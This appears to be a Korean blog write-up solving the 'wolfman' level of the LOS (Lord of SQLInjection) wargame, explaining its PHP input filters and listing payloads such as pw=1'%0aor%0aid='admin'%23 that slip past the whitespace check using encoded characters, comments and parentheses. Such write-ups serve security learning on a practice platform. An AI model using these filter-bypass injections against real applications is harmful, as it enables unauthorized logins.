[LOS] wolfman 풀이(5)

wolfman 문제를 확인해보면 and pw='{$_GET [pw]} 해당 pw에 삽입된 값으로 실행이 되고 있습니다.

 

조금 특이한 점이 있다면 전 단계에서는 " admin " 계정이 이미 선언된 상태에서 진행하였지만 이번의 경우 기본적으로 " guest " 계정으로 선언되어 있습니다.

 

if(preg_match('/prob|_|\.|\(\)/i', $_GET [pw])) exit("No Hack ~_~"); 
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~"); 

검증되는 필터링 함수가 더 추가되었습니다. 두 번째 preg_match 영역을 보시면 " / / " 즉 공백 검증하고 있는것을 확인하실 수 있습니다.

 

if($result['id'] == 'admin') solve("wolfman");

또한 해당 소스부분을 보시면 문제를 해결하기 위해 " admin " 이라는 계정으로 접근해야 된다는것을 알 수 있기 때문에

입력할 쿼리문에 " or  " 구문을 사용해서 id=admin이라는 것을 선언해주고 나머지 구문은 모두 주석 처리하면 깔끔하게 해결될 것 같습니다.

 

공백 우회

 pw=(1)'or(id='admin')%23 --> 괄호사용
 pw=1'%0dor%0did='admin'%23 --> 캐리지리턴(\r)
 pw=1'/**/or/**/id='admin'%23 --> 다중주석
 pw=1'+or+id='admin'%23 --> + 사용
 pw=1'%09or%09id='admin'%23 --> TAB사용(\t)
 pw=1'%0aor%0aid='admin'%23 --> Line FEED(\n)
 pw=1'%0bor%0bid='admin'%23 --> instead
 pw=1'%a0or%a0id='admin'%23 --> instead
 pw=1'%0cor%0cid='admin'%23 --> instead